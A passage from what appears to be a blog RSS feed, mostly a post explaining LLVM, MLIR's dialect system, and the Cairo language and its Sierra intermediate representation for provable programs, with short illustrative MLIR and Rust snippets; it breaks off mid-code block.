&lt;p&gt;Engineering is not a science. Bugs can still occur even with the best practices in place. However, by using languages like Rust and being mindful of potential vulnerabilities like panic situations and concurrency issues, we can minimize the risks of these bugs causing harm to our systems.&lt;&#x2F;p&gt;
&lt;p&gt;It’s important to remember that we are all human, and mistakes can happen. Still, by working together and communicating any bugs or issues in each other’s code, we can create safer and more robust systems for everyone. So let’s keep collaborating and striving towards better, more secure programming practices.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Exciting times at the intersection of Compilers and Applied Cryptography: Cairo and MLIR</title>
          <pubDate>Wed, 03 May 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/cairo-and-mlir/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/cairo-and-mlir/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/cairo-and-mlir/">&lt;p&gt;Making a Cairo&lt;br &#x2F;&gt;
not reinventing the wheel&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;I love jazz.&lt;br &#x2F;&gt;
Of all the jazz styles I love, jazz fusion is the one I enjoy most because I find any fusion of different things more stimulating.&lt;br &#x2F;&gt;
Something exciting is happening at the intersection of programming language theory, compiler implementation, and applied cryptography.&lt;&#x2F;p&gt;
&lt;p&gt;But the thing with jazz fusion is that it’s harder to get into unless you’re familiar with the elements being combined.&lt;br &#x2F;&gt;
Let me show you a few songs and how we’re mixing it up.&lt;br &#x2F;&gt;
If you’re familiar with one of these topics, bear with us; I promise it’s worth it.&lt;&#x2F;p&gt;
&lt;p&gt;Put on your seatbelts.&lt;br &#x2F;&gt;
3, 2, 1…&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;BDuDQ6c.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;intro-beat&quot;&gt;Intro beat&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;compilers-llvm&quot;&gt;Compilers &amp;amp; LLVM&lt;&#x2F;h3&gt;
&lt;p&gt;Some 20-something years ago, a group of compiler researchers at the University of Illinois needed a more flexible infrastructure.&lt;br &#x2F;&gt;
What they developed became known as LLVM and has since become the foremost compiler tooling project.&lt;br &#x2F;&gt;
It powers the analysis and code generation components of compilers for Clang, Swift, Rust, and many more languages.&lt;&#x2F;p&gt;
&lt;p&gt;From the 2004 CGO &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;llvm.org&#x2F;pubs&#x2F;2004-01-30-CGO-LLVM.html&quot;&gt;paper&lt;&#x2F;a&gt; introducing it:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;The LLVM compiler framework and code representation combine key capabilities that are important for practical, lifelong analysis and transformation of programs.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;At the heart of LLVM is LLVM IR, its Intermediate Representation.&lt;br &#x2F;&gt;
IRs are a combination of data formats and algorithms that allow the best expression of the properties a tool wishes to guarantee or prove about code.&lt;&#x2F;p&gt;
&lt;p&gt;An example of this is the fact that LLVM IR is in what’s known as SSA form, or Static Single Assignment, in which each variable is assigned a value only once.&lt;br &#x2F;&gt;
This makes programs easier for the compiler to reason about: among other things, it enables analyses and optimizations such as dead code elimination, constant propagation, and constant folding, and it facilitates later stages such as register allocation.&lt;&#x2F;p&gt;
&lt;p&gt;All this to say that IRs are a compiler writer’s way of solving problems by building abstraction ladders, and LLVM became the de facto backend platform for modern compilers.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;rise-of-ai&quot;&gt;Rise of AI&lt;&#x2F;h3&gt;
&lt;p&gt;You may know that machine learning algorithms and their applications are now a big deal.&lt;br &#x2F;&gt;
The driver of many economic fortunes and solutions to problems we only dreamed of solving before, the statistical school of AI has settled (?) on a set of techniques that involve dealing with numerical operations on enormous matrices of numbers and stringing together large numbers of these operations into computation graphs.&lt;br &#x2F;&gt;
These computational graphs’ fundamental elements are matrix multiplications, convolutions, data manipulations, and data movements.&lt;br &#x2F;&gt;
This sounds very computationally expensive, and it is. So the industry has gone (and is going) to great lengths to scale these approaches, making them cheaper and more effective on ever larger data sets.&lt;&#x2F;p&gt;
&lt;p&gt;A key observation was made at some point: many of the problems these algorithms solve have inherent or given parallelism, and industry was already producing machines designed explicitly for embarrassingly parallel numerical problems, namely shaders running on GPUs.&lt;br &#x2F;&gt;
Thus the first wave of this effort was repurposing video graphics card hardware to make them applicable to this new area.&lt;&#x2F;p&gt;
&lt;p&gt;Why did we change the tune from LLVM to AI and graphics cards? Because as they matured, these algorithms, models, techniques, tools, and libraries were standardized into frameworks usable by many non-specialist programmers, which required appropriate languages in which to express them, along with compilers for those languages.&lt;&#x2F;p&gt;
&lt;p&gt;Since LLVM had an IR that could, with some effort, be abstracted over GPU processors, it was used in tools such as PyTorch and Tensorflow to produce the code that would run on these graphical processing units.&lt;br &#x2F;&gt;
New hardware was designed, and LLVM was again used to target these new tensor processing units.&lt;&#x2F;p&gt;
&lt;p&gt;As a result, TensorFlow has several compiler components embedded in it, made by different vendors: Google has XLA, NVIDIA has TensorRT, and Intel has nGraph, all of which integrate with the TensorFlow optimizer and code generator and are very hardware-specific, but do not share common infrastructure.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;eRktk4K.jpg&quot; alt=&quot;Figure 1 from the paper “MLIR:  A Compiler Infrastructure for the End of Moore’s Law”&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;back-to-languages&quot;&gt;Back to languages&lt;&#x2F;h3&gt;
&lt;p&gt;In these intervening years since the early 2000s, the pendulum has swung back from dynamic to statically typed languages with more advanced type systems and code analysis phases.&lt;br &#x2F;&gt;
LLVM enabled Clang and new languages such as Rust, Julia, and Swift.&lt;br &#x2F;&gt;
Something these projects share in common is that they have found that many language implementation problems are best modeled at higher abstraction levels and implemented their intermediate representations to solve domain-specific problems, like language&#x2F;library-specific optimizations, flow-sensitive type checking (e.g., for linear types), and to improve the implementation of the lowering process.&lt;br &#x2F;&gt;
Swift has SIL, Rust has MIR, and so on.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;5UG47By.jpg&quot; alt=&quot;Figure 2 from the paper “MLIR:  A Compiler Infrastructure for the End of Moore’s Law”&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In other words, people started to realize that the complexity of the software stack above the low-level IR was very high since software reuse was low and quality was so variable.&lt;&#x2F;p&gt;
&lt;p&gt;After twenty years of expanding hardware targets and changing problem spaces, LLVM was found lacking in certain areas.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-mlir&quot;&gt;What (is MLIR?)&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;KKNOAlx.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Out of this came &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;&quot;&gt;MLIR&lt;&#x2F;a&gt; (Multi-Level Intermediate Representation), a project started by Chris Lattner et al. to build a common infrastructure to support all these different subsystems and to learn from the mistakes made and lessons learned in the development of LLVM.&lt;&#x2F;p&gt;
&lt;p&gt;I highly encourage you to read the introductory &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2002.11054.pdf&quot;&gt;paper&lt;&#x2F;a&gt; from whence these graphics came, as it is very readable, or to listen to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=qzljG6DKgic&quot;&gt;talk&lt;&#x2F;a&gt; Lattner and Shpeisman gave presenting it.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;MLIR aims to address software fragmentation, improve compilation for heterogeneous hardware, significantly reduce the cost of building domain-specific compilers, and aid in connecting existing compilers.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;There are several types of intermediate representations: linear (like assembly, a sequence of instructions), tree-like (like ASTs), and graph-like (like data flow or call graphs).&lt;br &#x2F;&gt;
As the project site states, “MLIR is intended to be a hybrid IR which can support multiple different requirements in a unified infrastructure.”&lt;&#x2F;p&gt;
&lt;p&gt;Unlike LLVM IR, where one central IR contains a complete set of instructions to represent the CPU&#x2F;GPU programs, in MLIR, there is no one IR.&lt;&#x2F;p&gt;
&lt;p&gt;Instead, MLIR provides a set of very abstract concepts: dialects, operations, regions, etc.&lt;&#x2F;p&gt;
&lt;p&gt;From the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;getting_started&#x2F;Glossary&#x2F;&quot;&gt;glossary&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;gt; A dialect is a grouping of functionality that can be used to extend the MLIR system.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;gt; A dialect creates a unique namespace within which new operations, attributes, and types are defined.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;gt; This is the fundamental method by which to extend MLIR.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;gt; In this way, MLIR is a meta-IR: its extensible framework allows it to be leveraged in many different ways&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;An &lt;strong&gt;operation&lt;&#x2F;strong&gt; is a unit of code in MLIR.&lt;br &#x2F;&gt;
Operations are the building blocks for all code and computations represented by MLIR.&lt;br &#x2F;&gt;
They are fully extensible (no fixed list of operations) and have application-specific semantics.&lt;&#x2F;p&gt;
&lt;p&gt;When implementing the code emitter, operations could map to processor instructions.&lt;br &#x2F;&gt;
When implementing an AST, nodes representing type conversions, function calls, and language operands could be mapped to operations.&lt;&#x2F;p&gt;
&lt;p&gt;Operations can have an arbitrary number of operands, results, and attributes and may contain an arbitrary number of regions.&lt;&#x2F;p&gt;
&lt;p&gt;A &lt;strong&gt;region&lt;&#x2F;strong&gt; is a control flow graph of MLIR blocks.&lt;&#x2F;p&gt;
&lt;p&gt;A &lt;strong&gt;block&lt;&#x2F;strong&gt;, or basic block, is a sequential list of operations without control flow.&lt;&#x2F;p&gt;
&lt;p&gt;Note that this creates a nested IR structure, as regions consist of blocks, which in turn, consist of a list of operations.&lt;br &#x2F;&gt;
Regions are a powerful mechanism to allow nested operations and localize information, simplifying code analysis and transformation.&lt;&#x2F;p&gt;
&lt;p&gt;A &lt;strong&gt;module&lt;&#x2F;strong&gt; is an operation containing a single region, which contains a single block composed of operations; it provides an organizational structure for MLIR operations.&lt;&#x2F;p&gt;
&lt;p&gt;MLIR allows multiple dialects, even those outside of MLIR’s codebase, to co-exist within one module.&lt;&#x2F;p&gt;
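&lt;p&gt;To make the nesting concrete, here is a minimal sketch in MLIR’s textual form (using the upstream &lt;code&gt;func&lt;&#x2F;code&gt; and &lt;code&gt;arith&lt;&#x2F;code&gt; dialects; the &lt;code&gt;@add&lt;&#x2F;code&gt; function itself is hypothetical): a module operation holds a region, whose block holds a function operation, whose own region holds the computation.&lt;&#x2F;p&gt;

```mlir
module {
  // func.func is an operation from the func dialect; its region
  // contains the function body.
  func.func @add(%a: i64, %b: i64) -> i64 {
    // This block is a sequential list of operations without control flow.
    %sum = arith.addi %a, %b : i64
    func.return %sum : i64
  }
}
```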
&lt;p&gt;In the context of MLIR, conversion is distinct from translation.&lt;br &#x2F;&gt;
The transformation of code represented in a dialect is called conversion. It can be either inter-dialect (when the conversion is into a semantically equivalent representation in another dialect) or intra-dialect. In contrast, translation is a transformation between MLIR and an external representation.&lt;&#x2F;p&gt;
&lt;p&gt;Thus an application using MLIR will typically use a collection of dialects as needed.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;what-are-the-advantages-of-llvm&quot;&gt;What are the advantages of MLIR?&lt;&#x2F;h3&gt;
&lt;p&gt;So you’re writing a compiler or need to add a backend to an existing compiler.&lt;br &#x2F;&gt;
Aside from code reuse across the industry, what advantages does MLIR provide? Why would you choose it over LLVM?&lt;&#x2F;p&gt;
&lt;p&gt;To begin with, the choice is not that binary since MLIR includes an LLVM IR dialect to which you can convert your application-specific dialect and thus leverage the existing LLVM toolchain.&lt;&#x2F;p&gt;
&lt;p&gt;MLIR also tries to provide universal patterns or passes that can apply to suitable operations without hardcoding them.&lt;&#x2F;p&gt;
&lt;p&gt;So MLIR allows you to easily define your dialect, pick from a growing ecosystem of middle- and low-level dialects targeting different computation models, and integrate them into your domain-specific compiler.&lt;&#x2F;p&gt;
&lt;p&gt;As &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.lei.chat&#x2F;posts&#x2F;compilers-and-irs-llvm-ir-spirv-and-mlir&#x2F;&quot;&gt;Lei Zhang&lt;&#x2F;a&gt; says:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In other words, if LLVM IR is centralized by nature and favors unified compiler flows, the MLIR infrastructure and its dialect ecosystem are decentralized by nature and favor diverse compiler flows.&lt;br &#x2F;&gt;
What is quite powerful is that MLIR enables different levels to be represented using the same infrastructure; so that the flow between different levels can become seamless.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The UNIX way!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;HNaqpaU.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Other benefits include:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Source code location tracking by default (each operation carries a source location attribute, so errors can point directly to the line of source code where they occurred)&lt;&#x2F;li&gt;
&lt;li&gt;A multithreaded pass manager, so compilation work runs on multiple cores by default&lt;&#x2F;li&gt;
&lt;li&gt;Optimizations written for other languages can be reused&lt;&#x2F;li&gt;
&lt;li&gt;LLVM can be reused for machine code generation&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Finally, suppose your domain does benefit from running all or some of your code on a GPU, TPU, or ASIC. In that case, MLIR provides a way to reuse an existing dialect targeting that computation model and hardware by writing a conversion to it and plugging in a code generator for the final translation.&lt;&#x2F;p&gt;
&lt;p&gt;It includes dialects for SPIR-V, a general &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;docs&#x2F;Dialects&#x2F;GPU&#x2F;&quot;&gt;GPU&lt;&#x2F;a&gt; dialect, and specific ones for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;docs&#x2F;Dialects&#x2F;NVGPU&#x2F;&quot;&gt;NVidia&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;docs&#x2F;Dialects&#x2F;AMDGPU&quot;&gt;AMD&lt;&#x2F;a&gt; GPUs.&lt;&#x2F;p&gt;
&lt;p&gt;All these advantages are direct results of MLIR’s abstraction level.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;why&quot;&gt;Why?&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s change the tune again.&lt;&#x2F;p&gt;
&lt;p&gt;In the land of blockchains, cryptocurrencies, and decentralized finance, several developments have converged:&lt;&#x2F;p&gt;
&lt;p&gt;First, the more established blockchains have paralleled the story in the machine learning world, offloading as much hashing as possible to GPUs and later ASICs (leaving us mere mortals scrabbling for the crumbs, or resigned to playing Emacs Tetris on a Raspberry Pi).&lt;br &#x2F;&gt;
Newer chains and L2s are expected to follow the same path.&lt;&#x2F;p&gt;
&lt;p&gt;Second, as their applications have become more mainstream (albeit with ups and downs), two concerns have taken center stage: scalability and privacy.&lt;br &#x2F;&gt;
Blockchains are not known for their efficiency, so the effort has gone into trying to have the best of both worlds, in part by moving away from Proof of Work, moving work to L2s, and turning back to guarantees provided by cryptographic techniques.&lt;br &#x2F;&gt;
As new techniques have been discovered and older ones have matured, Zero Knowledge Proof systems have emerged as the predominant area from which solutions to these two problems can be built.&lt;&#x2F;p&gt;
&lt;p&gt;But as is well known, despite a good amount of gatekeeping, cryptography is not something one can pick up over the weekend and “roll one’s own,” especially in developing areas such as ZKP.&lt;br &#x2F;&gt;
It’s not &lt;em&gt;just&lt;&#x2F;em&gt; that their proper use is complex or that many components are still in alpha, but because translating computation in a programming language to a form that can be input to these cryptographic primitives takes a lot of work and some ingenuity.&lt;br &#x2F;&gt;
Most ZKP protocols involve arithmetization: representing a computation in a numerical format that the proving system can consume. This usually means taking the instructions of the computation and building an expression graph of field operations, called an arithmetic circuit, and then generating an &lt;em&gt;execution trace&lt;&#x2F;em&gt;, which, very briefly, is a matrix of field elements representing the evolution of the computation over time.&lt;br &#x2F;&gt;
This execution trace is fed to the prover.&lt;&#x2F;p&gt;
&lt;p&gt;To encapsulate these processes, virtual machines have been designed and implemented to generate these numerical execution traces and provide computational guarantees, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;0xPolygonMiden&#x2F;miden-vm&quot;&gt;Miden&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo-rs&#x2F;pulls&quot;&gt;cairo-rs&lt;&#x2F;a&gt;.&lt;br &#x2F;&gt;
Once you have a virtual machine, you need a compiler and an intermediate representation.&lt;&#x2F;p&gt;
&lt;p&gt;You also can’t accept just any program, since you need to know that its execution is provable; otherwise you must accept the possibility of nonterminating programs, invalid transactions that consume excessive gas, the production of invalid or incomplete traces, and the prover quitting in the middle.&lt;br &#x2F;&gt;
Type theory and intermediate representations within compilers have become one of the most potent tools for producing code that has properties we can mechanically reason about and check.&lt;&#x2F;p&gt;
&lt;p&gt;So, in short, the needs to run on more diverse hardware, to incorporate programming language technology, to make complex cryptographic primitives easy to use, and to carry guarantees from developer tooling to execution layers have all come together to bring about a small renaissance of language implementation in the crypto world.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;cairo-sierra&quot;&gt;Cairo &amp;amp; Sierra&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;cairo&quot;&gt;Cairo&lt;&#x2F;a&gt; is a “language for creating provable programs for general computation” through the use of STARK-based validity proofs.&lt;br &#x2F;&gt;
If you’re not from a cryptography background, ZKPs and STARKs are too deep a rabbit hole for one article spanning so many topics; suffice it to say that STARKs enable blockchain scaling by efficiently proving the integrity of computations.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;STARK (Scalable Transparent ARgument of Knowledge) is a proof system that enables the proving and verification of computations.&lt;br &#x2F;&gt;
It allows processing a big computation, generating proof for the computation’s correctness, and verifying the proof in very few steps.&lt;&#x2F;p&gt;
&lt;p&gt;Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.starknet.io&#x2F;en&#x2F;posts&#x2F;engineering&#x2F;starks-starkex-and-starknet&quot;&gt;www.starknet.io&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;&lt;&#x2F;blockquote&gt;
&lt;p&gt;As Cairo matures, improvements have been added, such as a linear type system implementing ownership similar to Rust and an intermediate representation providing guarantees.&lt;br &#x2F;&gt;
Programming in Cairo is a bit different from your average von Neumann machine-based language: programs written in it run under a nondeterministic, immutable, contiguous memory model to ensure that all relevant memory has proper values and that appropriate values are not destroyed before the proof is generated, i.e., all correct programs are provable.&lt;&#x2F;p&gt;
&lt;p&gt;The Cairo compiler eventually compiles Cairo code to a “Cairo assembly,” which the virtual machines run to compute results and generate traces.&lt;br &#x2F;&gt;
However, as mentioned before, not all representations are adequate for all tasks, so Cairo introduced Sierra (&lt;strong&gt;S&lt;&#x2F;strong&gt;afe &lt;strong&gt;I&lt;&#x2F;strong&gt;nt&lt;strong&gt;E&lt;&#x2F;strong&gt;rmediate &lt;strong&gt;R&lt;&#x2F;strong&gt;ep&lt;strong&gt;R&lt;&#x2F;strong&gt;esent&lt;strong&gt;A&lt;&#x2F;strong&gt;tion).&lt;&#x2F;p&gt;
&lt;p&gt;Sierra’s goal is to guarantee that the generated code is always provable, and it achieves this by several means.&lt;&#x2F;p&gt;
&lt;p&gt;As mentioned, the memory model is immutable and contiguous and guarantees that memory will not be written twice; thus, dereferences cannot fail.&lt;br &#x2F;&gt;
The linear type system ensures that values are used exactly once.&lt;&#x2F;p&gt;
&lt;p&gt;There are no loops, and recursion is used instead; coupled with a gas meter for operations, this ensures termination.&lt;&#x2F;p&gt;
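&lt;p&gt;The idea can be sketched in a few lines (a toy model in Rust, not the actual Sierra mechanism): every recursive step consumes gas, and the computation aborts deterministically when gas runs out, so it always terminates.&lt;&#x2F;p&gt;

```rust
// Toy gas-metered recursion: returns (completed, remaining_n).
// Each recursive step costs one unit of gas; when gas hits zero we
// stop with a deterministic failure instead of running forever.
fn countdown(n: u64, gas: u64) -> (bool, u64) {
    if gas == 0 {
        return (false, n); // out of gas: abort, but still terminate
    }
    if n == 0 {
        return (true, 0); // finished normally
    }
    countdown(n - 1, gas - 1)
}

fn main() {
    println!("{:?}", countdown(5, 10)); // enough gas: (true, 0)
    println!("{:?}", countdown(5, 3)); // runs out of gas: (false, 2)
}
```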
&lt;p&gt;Assertions and panics are converted to conditional branches.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;why-use-mlir-in-the-context-of-cairo&quot;&gt;Why use MLIR in the context of Cairo?&lt;&#x2F;h3&gt;
&lt;p&gt;Cairo is also being used to build StarkNet, a permissionless Ethereum layer 2 network on which provable smart contracts can be deployed.&lt;br &#x2F;&gt;
Nodes on the network receive transactions and must verify they are valid before going about the business of generating the proof.&lt;br &#x2F;&gt;
The contract code must be run with the transaction inputs to generate the state change and the proof, and to verify it.&lt;&#x2F;p&gt;
&lt;p&gt;Another motivation is developer experience and tooling quality.&lt;br &#x2F;&gt;
Before deploying said contracts, the code must be written and tested, and being able to run Cairo code faster improves turnaround time in the development loop.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Enable faster checking of Cairo contract transactions&lt;&#x2F;li&gt;
&lt;li&gt;Enable faster gas computation&lt;&#x2F;li&gt;
&lt;li&gt;Enable better L2 sequencers&lt;&#x2F;li&gt;
&lt;li&gt;Enable better developer tooling&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;sierra-structure&quot;&gt;Sierra Structure&lt;&#x2F;h3&gt;
&lt;p&gt;So what does Sierra look like?&lt;br &#x2F;&gt;
We’ll see some examples shortly.&lt;br &#x2F;&gt;
Briefly, Sierra is a linear intermediate representation.&lt;br &#x2F;&gt;
A Sierra program consists of four sections:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;the types used in a particular program&lt;&#x2F;li&gt;
&lt;li&gt;the &lt;em&gt;libfuncs&lt;&#x2F;em&gt; used&lt;&#x2F;li&gt;
&lt;li&gt;the program statements&lt;&#x2F;li&gt;
&lt;li&gt;the descriptions of the user-defined functions&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; A full Sierra program.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[derive(Clone, Debug, Eq, PartialEq)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct Program {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; Declarations for all the user types.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub type_declarations: Vec&amp;lt;TypeDeclaration&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; Declarations for all the used library functions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub libfunc_declarations: Vec&amp;lt;LibfuncDeclaration&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The code of the program.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub statements: Vec&amp;lt;Statement&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; Descriptions of the functions - signatures and entry points.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub funcs: Vec&amp;lt;Function&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Libfuncs (or library functions) are representations of calls to built-in functions whose implementations are vetted to be correct, then compiled to Cairo assembly.&lt;br &#x2F;&gt;
The built-in libfuncs implementation is generic and can be specialized as defined in the libfunc declaration section.&lt;&#x2F;p&gt;
&lt;p&gt;Statements can either invoke a libfunc or return a variable and are executed in sequence:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; A possible statement.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[derive(Clone, Debug, Eq, PartialEq)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub enum GenStatement&amp;lt;StatementId&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Invocation(GenInvocation&amp;lt;StatementId&amp;gt;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Return(Vec&amp;lt;VarId&amp;gt;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;User-defined functions have an identifier, their type signature and parameters, and a statement identifier that marks the function entry point among the program statements.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub type Function = GenFunction&amp;lt;StatementIdx&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Represents a function (its name, signature, and entry point).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[derive(Clone, Debug, Eq, PartialEq)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct GenFunction&amp;lt;StatementId&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The name of the function.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub id: FunctionId,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
